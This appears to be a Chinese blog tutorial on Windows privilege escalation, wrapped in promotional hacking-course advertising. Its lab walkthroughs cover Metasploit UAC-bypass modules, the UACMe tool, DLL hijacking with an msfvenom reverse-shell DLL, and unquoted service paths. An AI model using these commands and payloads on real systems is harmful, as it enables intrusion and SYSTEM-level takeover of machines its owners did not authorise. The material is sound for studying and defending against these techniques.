Windows权限提升—BypassUAC、DLL劫持、引号路径、服务权限等提权
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、
如何自学黑客&网络安全
黑客零基础入门学习路线&规划
初级黑客
1、网络安全理论知识(2天)
①了解行业相关背景,前景,确定发展方向。
②学习网络安全相关法律法规。
③网络安全运营的概念。
④等保简介、等保规定、流程和规范。(非常重要)
2、渗透测试基础(一周)
①渗透测试的流程、分类、标准
②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking
③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察
④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等
3、操作系统基础(一周)
①Windows系统常见功能和命令
②Kali Linux系统常见功能和命令
③操作系统安全(系统入侵排查/系统加固基础)
4、计算机网络基础(一周)
①计算机网络基础、协议和架构
②网络通信原理、OSI模型、数据转发流程
③常见协议解析(HTTP、TCP/IP、ARP等)
④网络攻击技术与网络安全防御技术
⑤Web漏洞原理与防御:主动/被动攻击、DDOS攻击、CVE漏洞复现
5、数据库基础操作(2天)
①数据库基础
②SQL语言基础
③数据库安全加固
6、Web渗透(1周)
①HTML、CSS和JavaScript简介
②OWASP Top10
③Web漏洞扫描工具
④Web渗透工具:Nmap、BurpSuite、SQLMap、其他(菜刀、漏扫等)
恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;如果等保模块学的好,还可以从事等保工程师。薪资区间6k-15k
到此为止,大概1个月的时间。你已经成为了一名“脚本小子”。那么你还想往下探索吗?
如果你想要入坑黑客&网络安全,笔者给大家准备了一份:282G全网最全的网络安全资料包评论区留言即可领取!
7、脚本编程(初级/中级/高级)
在网络安全领域。是否具备编程能力是“脚本小子”和真正黑客的本质区别。在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。在分秒必争的CTF竞赛中,想要高效地使用自制的脚本工具来实现各种目的,更是需要拥有编程能力.
如果你零基础入门,笔者建议选择脚本语言Python/PHP/Go/Java中的一种,对常用库进行编程学习;搭建开发环境和选择IDE,PHP环境推荐Wamp和XAMPP, IDE强烈推荐Sublime;·Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;·用Python编写漏洞的exp,然后写一个简单的网络爬虫;·PHP基本语法学习并书写一个简单的博客系统;熟悉MVC架构,并试着学习一个PHP框架或者Python框架 (可选);·了解Bootstrap的布局或者CSS。
8、超级黑客
这部分内容对零基础的同学来说还比较遥远,就不展开细说了,附上学习路线。
网络安全工程师企业级学习路线
如图片过大被平台压缩导致看不清的话,评论区点赞和评论区留言获取吧。我都会回复的
视频配套资料&国内外网安书籍、文档&工具
当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。
一些笔者自己买的、其他平台白嫖不到的视频教程。
网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。
一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
##### 2.2.1.3. 搜索UAC绕过bypass方式
这里能够看到有很多的UAC绕过的bypass方式,但是这里面是分不同Windows版本的,有的可能在Windows7上能用,有的可能就不能用,不过最好选择日期靠近的,这样成功率大一点。
search uac ##搜索
##### 2.2.1.4. 尝试使用UAC绕过提权
use exploit/windows/local/bypassuac ##选择bypass
sessions ##选择会话
set session 1 ##设定会话
set lport 5555 ##设定反弹端口,这里不设置也可以,但是有时候直接反弹回来,会出现反弹不成功的情况。
run ##执行
##### 2.2.1.5. 查看反弹效果
通过反弹回来的效果能够看到,成功提权了。
#### 2.2.2. Windows10系统案例
这里还是使用默认的UAC等级进行提权。
##### 2.2.2.1. 尝试getsystem提权
可以看到,这里同样是提权失败。
##### 2.2.2.2. 尝试使用UAC绕过提权
这里我也是尝试了好几个bypass才成功的,环境不同,可能使用到的bypass也是不同的,有些bypass需要也能提权,但是需要点击确定,所以多尝试尝试。
use exploit/windows/local/bypassuac_silentcleanup ##选择模块
sessions ##选择会话
set session 5 ##设置会话
set lport 6666 ##设置监听端口
run ##执行
##### 2.2.2.3. 查看反弹效果
这里能够看到是成功提权了。
### 2.3. UACMe工具绕过UAC
这里我就不搭建WEB环境了,UACMe提取可以在低权限的时候提权,但是同样在UAC设置为高的时候同样也是无法进行直接提权的,需要人为的去点击确定才可以。
UACMe工具涵盖了Windows7-11以及server服务器系统均可以提权。
同时这里我就演示个Windows10系统的,至于Windows7肯定要比Windows10好提权。
#### 2.3.1. 下载链接
注意想要使用这个工具需要对其进行编译成功.exe文件,而我这里没有最新的.exe文件,这里给个老版的,但是也没差到哪里去,具体使用的介绍建议去GitHub上自己看。
[UACMe]( )
[百度网盘UACMe]( ) 提取码:86lm
#### 2.3.2. Windows10系统案例
这里在下载完UACMe的时候,里面会有两个exe执行文件,一个是32位的,一个是64位的,按照不同的系统位数,放入不同的exe文件进行执行。
##### 2.3.2.1. 系统内操作
注意这里弹出的窗口只是演示,在实际的环境中,我们无法登录桌面,可以使用改工具去运行木马后门,让其上线即可。
至于编号,新版的UACMe里包含70余种,可以一个一个尝试。
语法:Akagi64.exe 编号
##### 2.3.2.2. 反弹上线
这里同样我们监听一下端口,并且利用工具进行反弹上线。
语法:Akagi64.exe 编号 后门程序地址
##### 2.3.2.3. 查看权限
这里反弹上来的可能还是普通管理员权限,这里可以使用getsystem进行再次提权,可以看到成功提权。
## 3. dll劫持提权
### 3.1. Windows10系统案例
Windows 程序启动的时候需要 DLL。如果这些 DLL 不存在,则可以通过在应用程序要查找的位置放置恶意 DLL 来提权。通常,Windows 应用程序有其预定义好的搜索 DLL 的路径。
它会根据下面的顺序进行搜索:
1、应用程序加载的目录
2、C:\Windows\System32
3、C:\Windows\System
4、C:\Windows
5、当前工作目录 Current Working Directory,CWD
6、在 PATH 环境变量的目录(先系统后用户)
程序运行一般会加载系统dll或本身程序自带的dll,如果我们将程序执行时需要加载的dll文件替换成程序,那么我们下次在启动程序时所加载的dll就是我们替换的那个木马程序了。
#### 3.1.1. 收集进程加载的dll
这里会出现一个问题,没有远程桌面我们如何收集,这里其实有个很简单的办法就是,通过上线普通木马后,看看能不能查看有存在哪些服务,然后找到相关服务本地安装,安装后使用火绒剑等工具进行查找加载的dll文件即可。
像系统文件加载的dll我们是动不了的,我们一般能懂的都是未知文件和数字签名文件。
#### 3.1.2. MSF制作dll木马
这里我们选中libeay32.dll文件,我们就制作这个木马。
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.10.20 lport=5566 -f dll >libeay32.dll
#### 3.1.3. 替换dll文件
这里将生成的dll文件替换原本的dll。
#### 3.1.4. 运行软件
运行软件,不过需要注意的是,在实际环境中由于我未获取到桌面权限,所以需要等待管理员去运行,同时由于我们替换了dll文件,所以会导致管理员在运行软件的时候会出现无响应的情况,这时无法保证,管理员会卸载重新安装。
#### 3.1.5. 设置监听
这里设置监听,当管理员去运行软件的时候就会上线,像上面提到的,当软件不能用了,无法保证管理员不会卸载重装或者重启电脑,所以在获取权限后需要及时的移植到其它进程上面。
可以看到的是成功上线了。
#### 3.1.6. 提权
我这里没有提权成功,可能是由于系统问题,但是调试了半天也没成功,这也能够证明不是所有提权方式都是能够百分比提权成功的,这里也只是演示,可以用这个方式进行提权。
### 3.2. Windows2012系统案例
前面的分析与劫持等步骤就不在赘述了,直接看案效果把。
可以看到这里使用Windows2012就能够成功提权,所以之前提到的有些提权方式是根据不同系统可能有不同的效果。
## 4. 不带引号服务路径配合
注意提权方式和操作系统版本等都没有任何关系。
当Windows服务运行时,会发生以下两种情况之一。如果给出了可执行路径,并且引用了完整路径,则系统会按字面解释它并执行。但是,如果服务的二进制路径未包含在引号中,则操作系统将会执行找到的空格分隔的服务路径的第一个实例。
不过这个确实局限性还是很大的,比如虚拟机中没有找到这样的情况,实体机没有找到,客户现场机器也没找到…同时还有一个问题是就算有,很多都是在C盘中,如果基本权限不够大,那么也凉凉,也用不了。
### 4.1. 介绍案例
这里的图片我借用一下其它博客的,由于我自己电脑以及其它电脑,虚拟机都没有这样的路径。
次序执行
c:\program.exe
c:\program files.exe
c:\program files (x86)\grasssoft\macro.exe
c:\program files (x86)\grasssoft\macro expert\MacroService.exe
### 4.2. 查看系统中错误配置的路径
而通过下面的语句可以判断系统中是否存在这类问题,这里找到不代表就一定会存在问题,你看下面的图片明显无法进行替换。
wmic service get name,displayname,pathname,startmode |findstr /i “Auto” |findstr /i /v “C:\Windows\” |findstr /i /v “”"
### 4.3. 生成木马
这里由于我的虚拟机中并没有这样的路径,而且不好模拟,所以这里主要就是将一下流程,我们就按照第一张图片上的案例来演示。
c:\program files (x86)\grasssoft\macro expert\MacroService.exe ##获取到存在问题的路径
上面是获取到的错误路径,这里我们可以看到空格是在c:\program后面,那么我们生成一个木马,然后将木马名字改为:program.exe,并且发入C盘的根目录下。
这里放入C盘的原因是,服务去进行重启的时候,会按照上面的路径去寻找,而第一步就是找到C盘,同时又没有引号,那么当遇到program.exe的时候就会执行。
### 4.4. 重启服务
这里只需要让服务重启就可以了,不过这里同时遇到一个问题就是,当实际环境中是需要管理员去重启服务,或者重启服务器的时候启动,这样才能上线,不过一般这个上线就是system权限。
这里我就不演示了,主要没有那个条件,整体的流程就是这样的。
## 5. 不安全的服务权限
Windows服务有时被配置为与服务本身或与服务运行的目录相关的弱权限。这可能允许攻击者操纵服务,以便在其启动时执行任意代码,并将权限提升到SYSTEM。
### 给大家的福利
**零基础入门**
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
同时每个成长路线对应的板块都有配套的视频提供:
因篇幅有限,仅展示部分资料
网络安全面试题
绿盟护网行动
还有大家最喜欢的黑客技术
**网络安全源码合集+工具包**
**所有资料共282G**,朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》,可以扫描下方二维码领取(如遇扫码问题,可以在评论区留言领取哦)~
**网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。**
**[需要这份系统化资料的朋友,可以点击这里获取](https://bbs.csdn.net/topics/618540462)**
**一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**
这里是“一人公司”的成长家园。我们提供从产品曝光、技术变现到法律财税的全栈内容,并连接云服务、办公空间等稀缺资源,助你专注创造,无忧运营。
更多推荐
27
0- 0
已为社区贡献3条内容
所有评论(0)